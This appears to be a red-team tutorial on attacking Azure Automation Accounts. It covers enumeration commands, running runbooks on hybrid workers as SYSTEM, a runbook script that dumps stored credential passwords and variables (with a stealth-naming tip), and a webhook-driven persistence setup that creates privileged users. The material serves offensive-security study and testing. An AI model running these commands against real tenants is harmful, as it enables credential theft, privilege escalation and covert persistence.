Basic Information

From the docs: Azure Automation delivers a cloud-based automation, operating system updates, and configuration service that supports consistent management across your Azure and non-Azure environments. It includes process automation, configuration management, update management, shared capabilities, and heterogeneous features.

These are like "scheduled tasks" in Azure that will let you execute things (actions or even scripts) to manage, check and configure the Azure environment.

Run As Account

When Run as Account is used, it creates an Azure AD application with self-signed certificate, creates a service principal and assigns the Contributor role for the account in the current subscription (a lot of privileges). Microsoft recommends using a Managed Identity for Automation Account.

Runbooks & Jobs

Runbooks allow you to execute arbitrary PowerShell code. This could be abused by an attacker to steal the permissions of the attached principal (if any). In the code of Runbooks you could also find sensitive info (such as creds).

If you can read the jobs, do it as they contain the output of the run (potential sensitive info).

Go to Automation Accounts --> <Select Automation Account> --> Runbooks/Jobs/Hybrid worker groups/Watcher tasks/credentials/variables/certificates/connections

Hybrid Worker

A Runbook can be run in a container inside Azure or in a Hybrid Worker (non-azure machine). The Log Analytics Agent is deployed on the VM to register it as a hybrid worker. The hybrid worker jobs run as SYSTEM on Windows and nxautomation account on Linux. Each Hybrid Worker is registered in a Hybrid Worker Group.

Therefore, if you can choose to run a Runbook in a Windows Hybrid Worker, you will execute arbitrary commands inside an external machine as System (nice pivot technique).

Compromise State Configuration (SC)

From the docs: Azure Automation State Configuration is an Azure configuration management service that allows you to write, manage, and compile PowerShell Desired State Configuration (DSC) configurations for nodes in any cloud or on-premises datacenter. The service also imports DSC Resources, and assigns configurations to target nodes, all in the cloud. You can access Azure Automation State Configuration in the Azure portal by selecting State configuration (DSC) under Configuration Management.

Sensitive information could be found in these configurations.

RCE

It's possible to abuse SC to run arbitrary scripts in the managed machines.

Enumeration

# Check user right for automation
az extension add --upgrade -n automation
az automation account list # if it doesn't return anything the user is not a part of an Automation group

# Gets Azure Automation accounts in a resource group
Get-AzAutomationAccount

# List & get DSC configs
Get-AzAutomationAccount | Get-AzAutomationDscConfiguration
Get-AzAutomationAccount | Get-AzAutomationDscConfiguration | where {$_.name -match '<name>'} | Export-AzAutomationDscConfiguration -OutputFolder . -Debug
## Automation Accounts named SecurityBaselineConfigurationWS... are there by default (not interesting)

# List & get Run books code
Get-AzAutomationAccount | Get-AzAutomationRunbook
Get-AzAutomationAccount | Get-AzAutomationRunbook | Export-AzAutomationRunbook -OutputFolder /tmp

# List credentials & variables & others
Get-AzAutomationAccount | Get-AzAutomationCredential
Get-AzAutomationAccount | Get-AzAutomationVariable
Get-AzAutomationAccount | Get-AzAutomationConnection
Get-AzAutomationAccount | Get-AzAutomationCertificate
Get-AzAutomationAccount | Get-AzAutomationSchedule
Get-AzAutomationAccount | Get-AzAutomationModule
Get-AzAutomationAccount | Get-AzAutomationPython3Package
## Exfiltrate credentials & variables and the other info loading them in a Runbook and printing them

# List hybrid workers
Get-AzAutomationHybridWorkerGroup -AutomationAccountName <AUTOMATION-ACCOUNT> -ResourceGroupName <RG-NAME>

Create a Runbook

# Get the role of a user on the Automation account
# Contributor or higher = Can create and execute Runbooks
Get-AzRoleAssignment -Scope /subscriptions/<ID>/resourceGroups/<RG-NAME>/providers/Microsoft.Automation/automationAccounts/<AUTOMATION-ACCOUNT>

# Create a Powershell Runbook
Import-AzAutomationRunbook -Name <RUNBOOK-NAME> -Path C:\Tools\username.ps1 -AutomationAccountName <AUTOMATION-ACCOUNT> -ResourceGroupName <RG-NAME> -Type PowerShell -Force -Verbose

# Publish the Runbook
Publish-AzAutomationRunbook -RunbookName <RUNBOOK-NAME> -AutomationAccountName <AUTOMATION-ACCOUNT> -ResourceGroupName <RG-NAME> -Verbose

# Start the Runbook
Start-AzAutomationRunbook -RunbookName <RUNBOOK-NAME> -RunOn Workergroup1 -AutomationAccountName <AUTOMATION-ACCOUNT> -ResourceGroupName <RG-NAME> -Verbose

Exfiltrate Creds & Variables defined in an Automation Account using a Run Book

# Change the crdentials & variables names and add as many as you need
@'
$creds = Get-AutomationPSCredential -Name <credentials_name>
$runbook_variable = Get-AutomationVariable -name <variable_name>
$runbook_variable
$creds.GetNetworkCredential().username
$creds.GetNetworkCredential().password
'@ | out-file -encoding ascii 'runbook_get_creds.ps1'

$ResourceGroupName = '<resource_group_name>'
$AutomationAccountName = '<auto_acc_name>'
$RunBookName = 'Exif-Credentials' #Change this for stealthness

# Creare Run book, publish, start, and get output
New-AzAutomationRunBook -name $RunBookName -AutomationAccountName $AutomationAccountName -ResourceGroupName $ResourceGroupName -Type PowerShell
Import-AzAutomationRunBook -Path 'runbook_get_creds.ps1' -Name $RunBookName -Type PowerShell -AutomationAccountName $AutomationAccountName -ResourceGroupName $ResourceGroupName -Force
Publish-AzAutomationRunBook -Name $RunBookName -AutomationAccountName $AutomationAccountName -ResourceGroupName $ResourceGroupName
$start = Start-AzAutomationRunBook -Name $RunBookName -AutomationAccountName $AutomationAccountName -ResourceGroupName $ResourceGroupName
start-sleep 20
($start | Get-AzAutomationJob | Get-AzAutomationJobOutput).Summarynt

Steps for Setting Up an Automated Highly Privileged User Creation

1. Initialize an Automation Account

• Action Required: Create a new Automation Account.

• Specific Setting: Ensure "Create Azure Run As account" is enabled.

2. Import and Set Up Runbook

• Source: Download the sample runbook from MicroBurst GitHub Repository.

• Actions Required:

  • Import the runbook into the Automation Account.

  • Publish the runbook to make it executable.

  • Attach a webhook to the runbook, enabling external triggers.

3. Configure AzureAD Module

• Action Required: Add the AzureAD module to the Automation Account.

• Additional Step: Ensure all Azure Automation Modules are updated to their latest versions.

4. Permission Assignment

• Roles to Assign:

  • User Administrator

  • Subscription Owner

• Target: Assign these roles to the Automation Account for necessary privileges.

5. Awareness of Potential Access Loss

• Note: Be aware that configuring such automation might lead to losing control over the subscription.

6. Trigger User Creation

• Trigger the webhook to create a new user by sending a POST request.

• Use the PowerShell script provided, ensuring to replace the $uri with your actual webhook URL and updating the $AccountInfo with the desired username and password.

$uri = "<YOUR_WEBHOOK_URL>"
$AccountInfo  = @(@{RequestBody=@{Username="<DESIRED_USERNAME>";Password="<DESIRED_PASSWORD>"}})
$body = ConvertTo-Json -InputObject $AccountInfo
$response = Invoke-WebRequest -Method Post -Uri $uri -Body $body

References

• https://learn.microsoft.com/en-us/azure/automation/overview

• https://learn.microsoft.com/en-us/azure/automation/automation-dsc-overview

• https://github.com/rootsecdev/Azure-Red-Team#runbook-automation